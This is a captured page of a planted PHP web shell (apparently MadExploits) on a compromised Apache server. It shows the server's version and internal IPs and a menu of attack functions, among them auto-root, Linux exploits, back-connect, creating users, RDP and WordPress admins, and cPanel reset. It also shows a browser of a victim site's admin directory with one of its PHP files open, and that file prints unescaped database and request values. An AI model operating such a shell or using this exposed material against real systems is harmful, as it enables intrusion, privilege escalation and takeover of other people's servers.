Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
caiold1 /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-x--x
css
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
uploadDoc
[ DIR ]
drwxr-x--x
changePassword.php
3.99
KB
-rwxr-x--x
class.admin.php
4.39
KB
-rwxr-x--x
common.php
5.6
KB
-rwxr-x--x
common_old07032022.php
5.4
KB
-rwxr-x--x
dashboard.php
8.35
KB
-rwxr-x--x
dashboard_old07032022.php
7.37
KB
-rwxr-x--x
dbconfig.php
1.22
KB
-rwxr-x--x
editImage.php
2.18
KB
-rwxr-x--x
fpass.php
3.07
KB
-rwxr-x--x
index.php
4
KB
-rwxr-x--x
logout.php
624
B
-rwxr-x--x
password.php
3.51
KB
-rwxr-x--x
projectDetails.php
9.7
KB
-rwxr-x--x
projectDetailsEdit.php
9.02
KB
-rwxr-x--x
projectDetailsEdit_old07032022...
8.63
KB
-rwxr-x--x
projectDetails_old07032022.php
9.16
KB
-rwxr-x--x
publicationEdit.php
9.6
KB
-rwxr-x--x
publicationEdit_old07032022.ph...
8.62
KB
-rwxr-x--x
register.php
5.57
KB
-rwxr-x--x
resetpass.php
5.26
KB
-rwxr-x--x
vacanciesEdit.php
9.19
KB
-rwxr-x--x
vaccancy.php
8.17
KB
-rwxr-x--x
verifyLink.php
10.13
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : projectDetailsEdit_old07032022.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; $vID = $_GET[ 'vID' ]; $tokenAuth = $row[ 'authtokenid' ]; require_once 'common.php'; $projectV = new CAIWEB(); if ( isset( $_POST[ 'btn-submit' ] ) ) { $projectTitle = trim( $_POST[ 'projectTitle' ] ); $fundingAgency = trim( $_POST[ 'fundingAgency' ] ); $startDate = trim( $_POST[ 'startDate' ] ); $endDate = trim( $_POST[ 'endDate' ] ); $description = trim( $_POST[ 'description' ] ); $piDetails = trim( $_POST[ 'piDetails' ] ); $pID = trim( $_POST[ 'pID' ] ); $status=$_POST[ 'status' ]; if ( empty( $projectTitle ) ) { $errMSG = "Please enter project Title."; } else if ( empty( $fundingAgency ) ) { $errMSG = "Please enter Funding Agency"; } else if ( empty( $startDate ) ) { $errMSG = "Please enter start date"; } if ( !isset( $errMSG ) ) { if ( $projectV->projectUPD($pID, $projectTitle, $startDate,$endDate, $description,$fundingAgency,$piDetails,$status ) ) { $successMSG = "Project details has been submited successfuly.."; } else { $errMSG = "sorry , Query could not execute..."; } } } ?> <div id="layoutSidenav_content"> <main> <div class="container-fluid px-4 "> <h2 class="mt-4 mb-4">Project</h2> <div class="row"> <div class="col-xl-12"> <div class="card mb-4"> <div class="card-header"> Project details Form </div> <div class="card-body"> <form id="tutionFee" name="tutionFee" action="projectDetailsEdit.php?authToken=<?php echo $tokenAuth;?>" method="post" enctype="multipart/form-data" > <div class="row"> <div class="box-body"> <?php if ( isset( $errMSG ) ) { ?> <div class="alert alert-warning alert-dismissible fade show" role="alert"> <?php echo $errMSG; ?> <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div> <?php } else if ( isset( $successMSG ) ) { ?> <div class="alert alert-success alert-dismissible fade show" role="alert"> <?php echo $successMSG; ?> <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div> <?php } ?> </div> <?php $stmt1 = $projectV->runQuery( "SELECT * FROM projectdetails WHERE pID =:vID1" ); $stmt1->execute( array( ":vID1" => $vID ) ); $row = $stmt1->fetch( PDO::FETCH_ASSOC ); ?> <div class="mb-3 col-md-3"> <label for="exampleFormControlInput1" class="form-label">Project Title</label> <input type="hidden" name="pID" id="pID" value="<?php echo $row['pID']; ?>" class="form-control"> <input type="text" name="projectTitle" value="<?php echo $row['projectTitle']; ?>" required class="form-control"> </div> <div class="mb-3 col-md-3"> <label for="address" class="form-label">Funding Agency</label> <input type="text" name="fundingAgency" value="<?php echo $row['fundingAgency']; ?>" required class="form-control"> </div> <div class="mb-3 col-md-3"> <label for="startDate" class="form-label">Start Date</label> <input type="date" name="startDate" value="<?php echo $row['startDate']; ?>" required class="form-control"> </div> <div class="mb-3 col-md-3"> <label for="endDate" class="form-label">End Date</label> <input type="date" name="endDate" value="<?php echo $row['endDate']; ?>" required class="form-control"> </div> <div class="mb-3 col-md-12"> <label for="exampleFormControlTextarea1" class="form-label">Project Details</label> <textarea class="form-control" name="description" id="exampleFormControlTextarea1" rows="3"><?php echo $row['description']; ?></textarea> </div> <div class="mb-3 col-md-3"> <label for="exampleFormControlTextarea1" class="form-label">PI Details</label> <input type="text" name="piDetails" required class="form-control"> </div> <!-- <div class="mb-3 col-md-3"> <label for="exampleFormControlTextarea1" class="form-label">Project Image</label> <input type="file" name="pImg" required class="form-control"> </div>--> <div class="mb-3 col-md-4" style="padding-top: 40px;"> <?php $stats = $row['status']; if ( $stats == "2" ) { ?> <input type="radio" name="status" value="2" required checked> Active <input type="radio" name="status" value="1" required> Inactive <?php }?> <?php if ( $stats == "1" ) { ?> <input type="radio" name="status" value="2" required > Active <input type="radio" name="status" value="1" required checked> Inactive <?php }?> </div> </div> <div class="mb-3"> <input type="submit" class="btn btn-primary btn-sm" value="Submit" name="btn-submit"> </div> </form> </div> </div> </div> <div class="card mb-4"> <div class="card-header"> <i class="fas fa-table me-1"></i> Project Details </div> <div class="card-body"> <table id="datatablesSimple"> <thead> <tr> <th>Project Title</th> <th>Start Date</th> <th>End Date</th> <th>Description</th> <th>Funding Agency</th> <th>PI Details</th> <th>Status</th> <th>Action</th> </tr> </thead> <tfoot> <tr> <th>Project Title</th> <th>Start Date</th> <th>End Date</th> <th>Description</th> <th>Funding Agency</th> <th>PI Details</th> <th>Status</th> <th>Action</th> </tr> </tfoot> <tbody> <?php $result = $DB_con->prepare("SELECT * FROM projectdetails order by makerstamp desc "); $result->execute(); for($i=0; $row = $result->fetch(); $i++){ ?> <tr> <td><?php echo $row ['projectTitle']; ?></td> <td><?php echo $row ['startDate']; ?></td> <td><?php echo $row ['endDate']; ?></td> <td><?php echo $row ['description']; ?></td> <td><?php echo $row ['fundingAgency']; ?></td> <td><?php echo $row ['piDetails']; ?></td> <td><?php $vID = $row ['pID']; $status = $row ['status']; if($status =='2'){ ?> Active <?php } else { ?> Disable <?php } ?> </td> <td><a href="projectDetailsEdit.php?vID=<?php echo $vID; ?>&authToken=<?php echo $tokenAuth;?>">Edit</a></td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </main> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close